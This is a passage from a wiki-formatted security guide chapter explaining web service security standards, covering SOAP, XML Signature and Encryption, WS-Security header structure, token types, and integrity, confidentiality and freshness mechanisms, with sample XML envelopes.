W3C (see &amp;lt;u&amp;gt;http://www.w3.org&amp;lt;/u&amp;gt;) is the most well known industry group, which owns many Web-related standards and develops them in Working Group format. Of particular interest to this chapter are XML Schema, SOAP, XML-dsig, XML-enc, and WSDL standards (called recommendations in the W3C’s jargon).&lt;br /&gt;
&lt;br /&gt;
OASIS (see &amp;lt;u&amp;gt;http://www.oasis-open.org&amp;lt;/u&amp;gt;) mostly deals with Web Service-specific standards, not necessarily security-related. It also operates on a committee basis, forming so-called Technical Committees (TC) for the standards that it is going to be developing. Of interest for this discussion, OASIS owns WS-Security and SAML standards. &lt;br /&gt;
&lt;br /&gt;
Web Services Interoperability Organization (WS-I, see &amp;lt;u&amp;gt;http://www.ws-i.org/&amp;lt;/u&amp;gt;) was formed to promote a general framework for interoperable Web Services. Mostly its work consists of taking other broadly accepted standards, and developing so-called profiles, or sets of requirements for conforming Web Service implementations. In particular, its Basic Security Profile (BSP) relies on the OASIS’ WS-Security standard and specifies sets of optional and required security features in Web Services that claim interoperability.&lt;br /&gt;
&lt;br /&gt;
Liberty Alliance (LA, see &amp;lt;u&amp;gt;http://projectliberty.org&amp;lt;/u&amp;gt;) consortium was formed to develop and promote an interoperable Identity Federation framework. Although this framework is not strictly Web Service-specific, but rather general, it is important for this topic because of its close relation with the SAML standard developed by OASIS. &lt;br /&gt;
&lt;br /&gt;
Besides the previously listed organizations, there are other industry associations, both permanently established and short-lived, which push forward various Web Service security activities. They are usually made up of software industry’s leading companies, such as Microsoft, IBM, Verisign, BEA, Sun, and others, that join them to work on a particular issue or proposal. Results of these joint activities, once they reach certain maturity, are often submitted to standardizations committees as a basis for new industry standards.&lt;br /&gt;
&lt;br /&gt;
==SOAP ==&lt;br /&gt;
&lt;br /&gt;
Simple Object Access Protocol (SOAP, see &amp;lt;u&amp;gt;http://www.w3.org/TR/2003/REC-soap12-part1-20030624/&amp;lt;/u&amp;gt;) provides an XML-based framework for exchanging structured and typed information between peer services. This information, formatted into Header and Body, can theoretically be transmitted over a number of transport protocols, but only HTTP binding has been formally defined and is in active use today. SOAP provides for Remote Procedure Call-style (RPC) interactions, similar to remote function calls, and Document-style communication, with message contents based exclusively on XML Schema definitions in the Web Service’s WSDL. Invocation results may be optionally returned in the response message, or a Fault may be raised, which is roughly equivalent to using exceptions in traditional programming languages.&lt;br /&gt;
&lt;br /&gt;
SOAP protocol, while defining the communication framework, provides no help in terms of securing message exchanges – the communications must either happen over secure channels, or use protection mechanisms described later in this chapter. &lt;br /&gt;
&lt;br /&gt;
===XML security specifications (XML-dsig &amp;amp; Encryption) ===&lt;br /&gt;
&lt;br /&gt;
XML Signature (XML-dsig, see &amp;lt;u&amp;gt;http://www.w3.org/TR/2002/REC-xmldsig-core-20020212&amp;lt;/u&amp;gt;/), and XML Encryption (XML-enc, see &amp;lt;u&amp;gt;http://www.w3.org/TR/2002/REC-xmlenc-core-20021210/&amp;lt;/u&amp;gt;) add cryptographic protection to plain XML documents. These specifications add integrity, message and signer authentication, as well as support for encryption/decryption of whole XML documents or only of some elements inside them. &lt;br /&gt;
&lt;br /&gt;
The real value of those standards comes from the highly flexible framework developed to reference the data being processed (both internal and external relative to the XML document), refer to the secret keys and key pairs, and to represent results of signing/encrypting operations as XML, which is added to/substituted in the original document.&lt;br /&gt;
&lt;br /&gt;
However, by themselves, XML-dsig and XML-enc do not solve the problem of securing SOAP-based Web Service interactions, since the client and service first have to agree on the order of those operations, where to look for the signature, how to retrieve cryptographic tokens, which message elements should be signed and encrypted, how long a message is considered to be valid, and so on. These issues are addressed by the higher-level specifications, reviewed in the following sections.&lt;br /&gt;
&lt;br /&gt;
===Security specifications ===&lt;br /&gt;
&lt;br /&gt;
In addition to the above standards, there is a broad set of security-related specifications being currently developed for various aspects of Web Service operations. &lt;br /&gt;
&lt;br /&gt;
One of them is SAML, which defines how identity, attribute, and authorization assertions should be exchanged among participating services in a secure and interoperable way. &lt;br /&gt;
&lt;br /&gt;
A broad consortium, headed by Microsoft and IBM, with the input from Verisign, RSA Security, and other participants, developed a family of specifications, collectively known as “Web Services Roadmap”. Its foundation, WS-Security, has been submitted to OASIS and became an OASIS standard in 2004. Other important specifications from this family are still found in different development stages, and plans for their submission have not yet been announced, although they cover such important issues as security policies (WS-Policy et al), trust issues and security token exchange (WS-Trust), establishing context for secure conversation (WS-SecureConversation). One of the specifications in this family, WS-Federation, directly competes with the work being done by the LA consortium, and, although it is supposed to be incorporated into the Longhorn release of Windows, its future is not clear at the moment, since it has been significantly delayed and presently does not have industry momentum behind it.&lt;br /&gt;
&lt;br /&gt;
==WS-Security Standard ==&lt;br /&gt;
&lt;br /&gt;
WS-Security specification (WSS) was originally developed by Microsoft, IBM, and Verisign as part of a “Roadmap”, which was later renamed to Web Services Architecture, or WSA. WSS served as the foundation for all other specifications in this domain, creating a basic infrastructure for developing message-based security exchange. Because of its importance for establishing interoperable Web Services, it was submitted to OASIS and, after undergoing the required committee process, became an officially accepted standard. Current version is 1.0, and the work on the version 1.1 of the specification is under way and is expected to be finishing in the second half of 2005.&lt;br /&gt;
[[category:FIXME | outdated info? is it complete now?]]&lt;br /&gt;
&lt;br /&gt;
===Organization of the standard ===&lt;br /&gt;
&lt;br /&gt;
The WSS standard itself deals with several core security areas, leaving many details to so-called profile documents. The core areas, broadly defined by the standard, are: &lt;br /&gt;
&lt;br /&gt;
* Ways to add security headers (WSSE Header) to SOAP Envelopes&lt;br /&gt;
&lt;br /&gt;
* Attachment of security tokens and credentials to the message &lt;br /&gt;
&lt;br /&gt;
* Inserting a timestamp&lt;br /&gt;
&lt;br /&gt;
* Signing the message&lt;br /&gt;
&lt;br /&gt;
* Encrypting the message	&lt;br /&gt;
&lt;br /&gt;
* Extensibility&lt;br /&gt;
&lt;br /&gt;
Flexibility of the WS-Security standard lies in its extensibility, so that it remains adaptable to new types of security tokens and protocols that are being developed. This flexibility is achieved by defining additional profiles for inserting new types of security tokens into the WSS framework. While the signing and encrypting parts of the standards are not expected to require significant changes (only when the underlying XML-dsig and XML-enc are updated), the types of tokens, passed in WSS messages, and ways of attaching them to the message may vary substantially. At the high level the WSS standard defines three types of security tokens, attachable to a WSS Header: Username/password, Binary, and XML tokens. Each of those types is further specified in one (or more) profile document, which defines additional tokens' attributes and elements, needed to represent a particular type of security token. &lt;br /&gt;
&lt;br /&gt;
[[Image:WSS_Specification_Hierarchy.gif|Figure 4: WSS specification hierarchy]]&lt;br /&gt;
&lt;br /&gt;
===Purpose ===&lt;br /&gt;
&lt;br /&gt;
The primary goal of the WSS standard is providing tools for message-level communication protection, whereas each message represents an isolated piece of information, carrying enough security data to verify all important message properties, such as: authenticity, integrity, freshness, and to initiate decryption of any encrypted message parts. This concept is a stark contrast to the traditional channel security, which methodically applies pre-negotiated security context to the whole stream, as opposed to the selective process of securing individual messages in WSS. In the Roadmap, that type of service is eventually expected to be provided by implementations of standards like WS-SecureConversation.&lt;br /&gt;
&lt;br /&gt;
From the beginning, the WSS standard was conceived as a message-level toolkit for securely delivering data for higher level protocols. Those protocols, based on the standards like WS-Policy, WS-Trust, and Liberty Alliance, rely on the transmitted tokens to implement access control policies, token exchange, and other types of protection and integration. However, taken alone, the WSS standard does not mandate any specific security properties, and an ad-hoc application of its constructs can lead to subtle security vulnerabilities and hard to detect problems, as is also discussed in later sections of this chapter.&lt;br /&gt;
&lt;br /&gt;
==WS-Security Building Blocks ==&lt;br /&gt;
&lt;br /&gt;
The WSS standard actually consists of a number of documents – one core document, which defines how security headers may be included into SOAP envelope and describes all high-level blocks, which must be present in a valid security header. Profile documents have the dual task of extending definitions for the token types they are dealing with, providing additional attributes, elements, as well as defining relationships left out of the core specification, such as using attachments.&lt;br /&gt;
&lt;br /&gt;
Core WSS 1.1 specification, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16790/wss-v1.1-spec-os-SOAPMessageSecurity.pdf&amp;lt;/u&amp;gt;, defines several types of security tokens (discussed later in this section – see 0), ways to reference them, timestamps, and ways to apply XML-dsig and XML-enc in the security headers – see the XML Dsig section for more details about their general structure.&lt;br /&gt;
&lt;br /&gt;
Associated specifications are:&lt;br /&gt;
&lt;br /&gt;
* Username token profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16782/wss-v1.1-spec-os-UsernameTokenProfile.pdf&amp;lt;/u&amp;gt;, which adds various password-related extensions to the basic UsernameToken from the core specification&lt;br /&gt;
&lt;br /&gt;
* X.509 token profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16785/wss-v1.1-spec-os-x509TokenProfile.pdf&amp;lt;/u&amp;gt; which specifies, how X.509 certificates may be passed in the BinarySecurityToken, specified by the core document&lt;br /&gt;
&lt;br /&gt;
* SAML Token profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16768/wss-v1.1-spec-os-SAMLTokenProfile.pdf&amp;lt;/u&amp;gt; that specifies how XML-based SAML tokens can be inserted into WSS headers.&lt;br /&gt;
&lt;br /&gt;
*  Kerberos Token Profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16788/wss-v1.1-spec-os-KerberosTokenProfile.pdf&amp;lt;/u&amp;gt; that defines how to encode Kerberos tickets and attach them to SOAP messages.&lt;br /&gt;
&lt;br /&gt;
* Rights Expression Language (REL) Token Profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16687/oasis-wss-rel-token-profile-1.1.pdf&amp;lt;/u&amp;gt; that describes the use of ISO/IEC 21000-5 Rights Expressions with respect to the WS-Security specification.&lt;br /&gt;
&lt;br /&gt;
* SOAP with Attachments (SWA) Profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16672/wss-v1.1-spec-os-SwAProfile.pdf&amp;lt;/u&amp;gt; that describes how to use WSS-Sec with SOAP Messages with Attachments.&lt;br /&gt;
&lt;br /&gt;
===How data is passed ===&lt;br /&gt;
&lt;br /&gt;
WSS security specification deals with two distinct types of data: security information, which includes security tokens, signatures, digests, etc; and message data, i.e. everything else that is passed in the SOAP message. Being an XML-based standard, WSS works with textual information grouped into XML elements. Any binary data, such as cryptographic signatures or Kerberos tokens, has to go through a special transform, called Base64 encoding/decoding, which provides straightforward conversion from binary to ASCII formats and back. The example below demonstrates how binary data looks like in the encoded format:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''cCBDQTAeFw0wNDA1MTIxNjIzMDRaFw0wNTA1MTIxNjIzMDRaMG8xCz''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
After encoding a binary element, an attribute with the algorithm’s identifier is added to the XML element carrying the data, so that the receiver would know to apply the correct decoder to read it. These identifiers are defined in the WSS specification documents.&lt;br /&gt;
&lt;br /&gt;
===Security header’s structure ===&lt;br /&gt;
&lt;br /&gt;
A security header in a message is used as a sort of an envelope around a letter – it seals and protects the letter, but does not care about its content. This “indifference” works in the other direction as well, as the letter (SOAP message) should not know, nor should it care about its envelope (WSS Header), since the different units of information, carried on the envelope and in the letter, are presumably targeted at different people or applications.&lt;br /&gt;
&lt;br /&gt;
A SOAP Header may actually contain multiple security headers, as long as they are addressed to different actors (for SOAP 1.1), or roles (for SOAP 1.2). Their contents may also be referring to each other, but such references present a very complicated logistical problem for determining the proper order of decryptions/signature verifications, and should generally be avoided. WSS security header itself has a loose structure, as the specification itself does not require any elements to be present – so, the minimalist header with an empty message will look like:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;soap:Envelope xmlns:soap=&amp;quot;http://schemas.xmlsoap.org/soap/envelope/&amp;quot;&amp;gt;&lt;br /&gt;
     &amp;lt;soap:Header&amp;gt;&lt;br /&gt;
         &amp;lt;wsse:Security xmlns:wsse=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd&amp;quot; xmlns:wsu=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd&amp;quot; soap:mustUnderstand=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
         &amp;lt;/wsse:Security&amp;gt;&lt;br /&gt;
    &amp;lt;/soap:Header&amp;gt;&lt;br /&gt;
     &amp;lt;soap:Body&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
     &amp;lt;/soap:Body&amp;gt;&lt;br /&gt;
 &amp;lt;/soap:Envelope&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
However, to be useful, it must carry some information, which is going to help securing the message. It means including one or more security tokens (see 0) with references, XML Signature, and XML Encryption elements, if the message is signed and/or encrypted. So, a typical header will look more like the following picture: &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;soap:Envelope xmlns:soap=&amp;quot;http://schemas.xmlsoap.org/soap/envelope/&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;soap:Header&amp;gt;&lt;br /&gt;
     &amp;lt;wsse:Security xmlns=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd&amp;quot; xmlns:wsse=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd&amp;quot; xmlns:wsu=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd&amp;quot; soap:mustUnderstand=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
       &amp;lt;wsse:BinarySecurityToken EncodingType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary&amp;quot; ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509v3&amp;quot; wsu:Id=&amp;quot;aXhOJ5&amp;quot;&amp;gt;MIICtzCCAi... &lt;br /&gt;
       &amp;lt;/wsse:BinarySecurityToken&amp;gt;&lt;br /&gt;
       &amp;lt;xenc:EncryptedKey xmlns:xenc=&amp;quot;http://www.w3.org/2001/04/xmlenc#&amp;quot;&amp;gt;&lt;br /&gt;
         &amp;lt;xenc:EncryptionMethod Algorithm=&amp;quot;http://www.w3.org/2001/04/xmlenc#rsa-1_5&amp;quot;/&amp;gt;&lt;br /&gt;
 	&amp;lt;dsig:KeyInfo xmlns:dsig=&amp;quot;http://www.w3.org/2000/09/xmldsig#&amp;quot;&amp;gt;&lt;br /&gt;
 	  &amp;lt;wsse:SecurityTokenReference&amp;gt;&lt;br /&gt;
 	    &amp;lt;wsse:Reference URI=&amp;quot;#aXhOJ5&amp;quot; ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509v3&amp;quot;/&amp;gt;&lt;br /&gt;
 	  &amp;lt;/wsse:SecurityTokenReference&amp;gt;  &lt;br /&gt;
 	&amp;lt;/dsig:KeyInfo&amp;gt;&lt;br /&gt;
   	&amp;lt;xenc:CipherData&amp;gt;&lt;br /&gt;
   	  &amp;lt;xenc:CipherValue&amp;gt;Nb0Mf...&amp;lt;/xenc:CipherValue&amp;gt;&lt;br /&gt;
   	&amp;lt;/xenc:CipherData&amp;gt;&lt;br /&gt;
   	&amp;lt;xenc:ReferenceList&amp;gt;&lt;br /&gt;
   	  &amp;lt;xenc:DataReference URI=&amp;quot;#aDNa2iD&amp;quot;/&amp;gt;&lt;br /&gt;
   	&amp;lt;/xenc:ReferenceList&amp;gt;&lt;br /&gt;
       &amp;lt;/xenc:EncryptedKey&amp;gt;&lt;br /&gt;
       &amp;lt;wsse:SecurityTokenReference wsu:Id=&amp;quot;aZG0sG&amp;quot;&amp;gt;&lt;br /&gt;
 	&amp;lt;wsse:KeyIdentifier ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/XX/oasis-2004XX-wss-saml-token-profile-1.0#SAMLAssertionID&amp;quot; wsu:Id=&amp;quot;a2tv1Uz&amp;quot;&amp;gt; 1106844369755&amp;lt;/wsse:KeyIdentifier&amp;gt;&lt;br /&gt;
       &amp;lt;/wsse:SecurityTokenReference&amp;gt;&lt;br /&gt;
       &amp;lt;saml:Assertion AssertionID=&amp;quot;1106844369755&amp;quot; IssueInstant=&amp;quot;2005-01-27T16:46:09.755Z&amp;quot; Issuer=&amp;quot;www.my.com&amp;quot; MajorVersion=&amp;quot;1&amp;quot; MinorVersion=&amp;quot;1&amp;quot; xmlns:saml=&amp;quot;urn:oasis:names:tc:SAML:1.0:assertion&amp;quot;&amp;gt;&lt;br /&gt;
 		...				&lt;br /&gt;
       &amp;lt;/saml:Assertion&amp;gt;&lt;br /&gt;
       &amp;lt;wsu:Timestamp wsu:Id=&amp;quot;afc6fbe-a7d8-fbf3-9ac4-f884f435a9c1&amp;quot;&amp;gt;&lt;br /&gt;
 	&amp;lt;wsu:Created&amp;gt;2005-01-27T16:46:10Z&amp;lt;/wsu:Created&amp;gt;&lt;br /&gt;
 	&amp;lt;wsu:Expires&amp;gt;2005-01-27T18:46:10Z&amp;lt;/wsu:Expires&amp;gt;&lt;br /&gt;
      &amp;lt;/wsu:Timestamp&amp;gt;&lt;br /&gt;
       &amp;lt;dsig:Signature xmlns:dsig=&amp;quot;http://www.w3.org/2000/09/xmldsig#&amp;quot; Id=&amp;quot;sb738c7&amp;quot;&amp;gt;&lt;br /&gt;
 	&amp;lt;dsig:SignedInfo Id=&amp;quot;obLkHzaCOrAW4kxC9az0bLA22&amp;quot;&amp;gt;&lt;br /&gt;
 		...&lt;br /&gt;
 	  &amp;lt;dsig:Reference URI=&amp;quot;#s91397860&amp;quot;&amp;gt;&lt;br /&gt;
 		...									&lt;br /&gt;
             &amp;lt;dsig:DigestValue&amp;gt;5R3GSp+OOn17lSdE0knq4GXqgYM=&amp;lt;/dsig:DigestValue&amp;gt;&lt;br /&gt;
 	  &amp;lt;/dsig:Reference&amp;gt;&lt;br /&gt;
 	  &amp;lt;/dsig:SignedInfo&amp;gt;&lt;br /&gt;
 	  &amp;lt;dsig:SignatureValue Id=&amp;quot;a9utKU9UZk&amp;quot;&amp;gt;LIkagbCr5bkXLs8l...&amp;lt;/dsig:SignatureValue&amp;gt;&lt;br /&gt;
 	  &amp;lt;dsig:KeyInfo&amp;gt;&lt;br /&gt;
 	  &amp;lt;wsse:SecurityTokenReference&amp;gt;&lt;br /&gt;
 	    &amp;lt;wsse:Reference URI=&amp;quot;#aXhOJ5&amp;quot; ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509v3&amp;quot;/&amp;gt;&lt;br /&gt;
 	  &amp;lt;/wsse:SecurityTokenReference&amp;gt;&lt;br /&gt;
         &amp;lt;/dsig:KeyInfo&amp;gt;&lt;br /&gt;
       &amp;lt;/dsig:Signature&amp;gt;&lt;br /&gt;
     &amp;lt;/wsse:Security&amp;gt;&lt;br /&gt;
   &amp;lt;/soap:Header&amp;gt;&lt;br /&gt;
   &amp;lt;soap:Body xmlns:wsu=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd&amp;quot; wsu:Id=&amp;quot;s91397860&amp;quot;&amp;gt;&lt;br /&gt;
     &amp;lt;xenc:EncryptedData xmlns:xenc=&amp;quot;http://www.w3.org/2001/04/xmlenc#&amp;quot; Id=&amp;quot;aDNa2iD&amp;quot; Type=&amp;quot;http://www.w3.org/2001/04/xmlenc#Content&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xenc:EncryptionMethod Algorithm=&amp;quot;http://www.w3.org/2001/04/xmlenc#tripledes-cbc&amp;quot;/&amp;gt;&lt;br /&gt;
       &amp;lt;xenc:CipherData&amp;gt;&lt;br /&gt;
 	&amp;lt;xenc:CipherValue&amp;gt;XFM4J6C...&amp;lt;/xenc:CipherValue&amp;gt;&lt;br /&gt;
       &amp;lt;/xenc:CipherData&amp;gt;&lt;br /&gt;
     &amp;lt;/xenc:EncryptedData&amp;gt;&lt;br /&gt;
   &amp;lt;/soap:Body&amp;gt;&lt;br /&gt;
 &amp;lt;/soap:Envelope&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Types of tokens ===&lt;br /&gt;
&lt;br /&gt;
A WSS Header may have the following types of security tokens in it:&lt;br /&gt;
&lt;br /&gt;
* Username token&lt;br /&gt;
&lt;br /&gt;
Defines mechanisms to pass username and, optionally, a password - the latter is described in the username profile document. Unless the whole token is encrypted, a message which includes a clear-text password should always be transmitted via a secured channel. In situations where the target Web Service has access to clear-text passwords for verification (this might not be possible with LDAP or some other user directories, which do not return clear-text passwords), using a hashed version with nonce and a timestamp is generally preferable. The profile document defines an unambiguous algorithm for producing password hash: &lt;br /&gt;
&lt;br /&gt;
 Password_Digest = Base64 ( SHA-1 ( nonce + created + password ) )&lt;br /&gt;
&lt;br /&gt;
* Binary token&lt;br /&gt;
&lt;br /&gt;
They are used to convey binary data, such as X.509 certificates, in a text-encoded format, Base64 by default. The core specification defines BinarySecurityToken element, while profile documents specify additional attributes and sub-elements to handle attachment of various tokens. Presently, both the X.509 and the Kerberos profiles have been adopted.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
       &amp;lt;wsse:BinarySecurityToken EncodingType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary&amp;quot; ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509v3&amp;quot; wsu:Id=&amp;quot;aXhOJ5&amp;quot;&amp;gt;&lt;br /&gt;
         MIICtzCCAi...&lt;br /&gt;
       &amp;lt;/wsse:BinarySecurityToken&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* XML token&lt;br /&gt;
&lt;br /&gt;
These are meant for any kind of XML-based tokens, but primarily – for SAML assertions. The core specification merely mentions the possibility of inserting such tokens, leaving all details to the profile documents. At the moment, SAML 1.1 profile has been accepted by OASIS.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 	&amp;lt;saml:Assertion AssertionID=&amp;quot;1106844369755&amp;quot; IssueInstant=&amp;quot;2005-01-27T16:46:09.755Z&amp;quot; Issuer=&amp;quot;www.my.com&amp;quot; MajorVersion=&amp;quot;1&amp;quot; MinorVersion=&amp;quot;1&amp;quot; xmlns:saml=&amp;quot;urn:oasis:names:tc:SAML:1.0:assertion&amp;quot;&amp;gt;&lt;br /&gt;
 		...				&lt;br /&gt;
 	&amp;lt;/saml:Assertion&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Although technically it is not a security token, a Timestamp element may be inserted into a security header to ensure message’s freshness. See the further reading section for a design pattern on this.&lt;br /&gt;
&lt;br /&gt;
===Referencing message parts ===&lt;br /&gt;
&lt;br /&gt;
In order to retrieve security tokens, passed in the message, or to identify signed and encrypted message parts, the core specification adopts usage of a special attribute, wsu:Id. The only requirement on this attribute is that the values of such IDs should be unique within the scope of XML document where they are defined. Its application has a significant advantage for the intermediate processors, as it does not require understanding of the message’s XML Schema. Unfortunately, XML Signature and Encryption specifications do not allow for attribute extensibility (i.e. they have closed schema), so, when trying to locate signature or encryption elements, local IDs of the Signature and Encryption elements must be considered first.&lt;br /&gt;
&lt;br /&gt;
WSS core specification also defines a general mechanism for referencing security tokens via SecurityTokenReference element. An example of such element, referring to a SAML assertion in the same header, is provided below:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 	&amp;lt;wsse:SecurityTokenReference wsu:Id=&amp;quot;aZG0sGbRpXLySzgM1X6aSjg22&amp;quot;&amp;gt;&lt;br /&gt;
 	  &amp;lt;wsse:KeyIdentifier ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/XX/oasis-2004XX-wss-saml-token-profile-1.0#SAMLAssertionID&amp;quot; wsu:Id=&amp;quot;a2tv1Uz&amp;quot;&amp;gt;&lt;br /&gt;
             1106844369755&lt;br /&gt;
           &amp;lt;/wsse:KeyIdentifier&amp;gt;&lt;br /&gt;
 	&amp;lt;/wsse:SecurityTokenReference&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
As this element was designed to refer to pretty much any possible token type (including encryption keys, certificates, SAML assertions, etc) both internal and external to the WSS Header, it is enormously complicated. The specification recommends using two of its possible four reference types – Direct References (by URI) and Key Identifiers (some kind of token identifier). Profile documents (SAML, X.509 for instance) provide additional extensions to these mechanisms to take advantage of specific qualities of different token types.&lt;br /&gt;
&lt;br /&gt;
==Communication Protection Mechanisms ==&lt;br /&gt;
&lt;br /&gt;
As was already explained earlier (see 0), channel security, while providing important services, is not a panacea, as it does not solve many of the issues facing Web Service developers. WSS helps addressing some of them at the SOAP message level, using the mechanisms described in the sections below.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Integrity ===&lt;br /&gt;
&lt;br /&gt;
WSS specification makes use of the XML-dsig standard to ensure message integrity, restricting its functionality in certain cases; for instance, only explicitly referenced elements can be signed (i.e. no Embedding or Embedded signature modes are allowed). Prior to signing an XML document, a transformation is required to create its canonical representation, taking into account the fact that XML documents can be represented in a number of semantically equivalent ways. There are two main transformations defined by the XML Digital Signature WG at W3C, Inclusive and Exclusive Canonicalization Transforms (C14N and EXC-C14N), which differ in the way namespace declarations are processed. The WSS core specification specifically recommends using EXC-C14N, as it allows copying signed XML content into other documents without invalidating the signature.&lt;br /&gt;
&lt;br /&gt;
In order to provide a uniform way of addressing signed tokens, WSS adds a Security Token Reference (STR) Dereference Transform option, which is comparable with dereferencing a pointer to an object of specific data type in programming languages. Similarly, in addition to the XML Signature-defined ways of addressing signing keys, WSS allows for references to signing security tokens through the STR mechanism (explained in 0), extended by token profiles to accommodate specific token types. A typical signature example is shown in an earlier sample in the section 0.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
Typically, an XML signature is applied to secure elements such as SOAP Body and the timestamp, as well as any user credentials, passed in the request. There is an interesting twist when a particular element is both signed and encrypted, since these operations may follow (even repeatedly) in any order, and knowledge of their ordering is required for signature verification. To address this issue, the WSS core specification requires that each new element is pre-pended to the security header, thus defining the “natural” order of operations. A particularly nasty problem arises when there are several security headers in a single SOAP message, using overlapping signature and encryption blocks, as there is nothing in this case that would point to the right order of operations.&lt;br /&gt;
&lt;br /&gt;
===Confidentiality ===&lt;br /&gt;
&lt;br /&gt;
For its confidentiality protection, WSS relies on yet another standard, XML Encryption. Similarly to XML-dsig, this standard operates on selected elements of the SOAP message, but it then replaces the encrypted element’s data with a &amp;lt;xenc:EncryptedData&amp;gt; sub-element carrying the encrypted bytes. For encryption efficiency, the specification recommends using a unique key, which is then encrypted by the recipient’s public key and pre-pended to the security header in a &amp;lt;xenc:EncryptedKey&amp;gt; element. A SOAP message with encrypted body is shown in the section 0.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Freshness ===&lt;br /&gt;
&lt;br /&gt;
SOAP messages’ freshness is addressed via timestamp mechanism – each security header may contain just one such element, which states, in UTC time and using the UTC time format, creation and expiration moments of the security header. It is important to realize that the timestamp is applied to the WSS Header, not to the SOAP message itself, since the latter may contain multiple security headers, each with a different timestamp. There is an unresolved problem with this “single timestampt” approach, since, once the timestamp is created and signed, it is impossible to update it without breaking existing signatures, even in case of a legitimate change in the WSS Header.&lt;br /&gt;
&lt;br /&gt;
       &amp;lt;wsu:Timestamp wsu:Id=&amp;quot;afc6fbe-a7d8-fbf3-9ac4-f884f435a9c1&amp;quot;&amp;gt;&lt;br /&gt;
 	&amp;lt;wsu:Created&amp;gt;2005-01-27T16:46:10Z&amp;lt;/wsu:Created&amp;gt;&lt;br /&gt;
 	&amp;lt;wsu:Expires&amp;gt;2005-01-27T18:46:10Z&amp;lt;/wsu:Expires&amp;gt;&lt;br /&gt;
       &amp;lt;/wsu:Timestamp&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If a timestamp is included in a message, it is typically signed to prevent tampering and replay attacks. There is no mechanism foreseen to address clock synchronization issue (which, as was already point out earlier, is generally not an issue in modern day systems) – this has to be addressed out-of-band as far as the WSS mechanics is concerned. See the further reading section for a design pattern addressing this issue.&lt;br /&gt;
&lt;br /&gt;
==Access Control Mechanisms ==&lt;br /&gt;
&lt;br /&gt;
When it comes to access control decisions, Web Services do not offer specific protection mechanisms by themselves – they just have the means to carry the tokens and data payloads in a secure manner between source and destination SOAP endpoints. &lt;br /&gt;
&lt;br /&gt;
For more complete description of access control tasks, please, refer to other sections of this Development Guide.&lt;br /&gt;
&lt;br /&gt;
===Identification ===&lt;br /&gt;
&lt;br /&gt;
Identification represents a claim to have certain identity, which is expressed by attaching certain information to the message. This can be a username, an SAML assertion, a Kerberos ticket, or any other piece of information, from which the service can infer who the caller claims to be. &lt;br /&gt;
&lt;br /&gt;
WSS represents a very good way to convey this information, as it defines an extensible mechanism for attaching various token types to a message (see 0). It is the receiver’s job to extract the attached token and figure out which identity it carries, or to reject the message if it can find no acceptable token in it.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Authentication ===&lt;br /&gt;
&lt;br /&gt;
Authentication can come in two flavors – credentials verification or token validation. The subtle difference between the two is that tokens are issued after some kind of authentication has already happened prior to the current invocation, and they usually contain user’s identity along with the proof of its integrity. &lt;br /&gt;
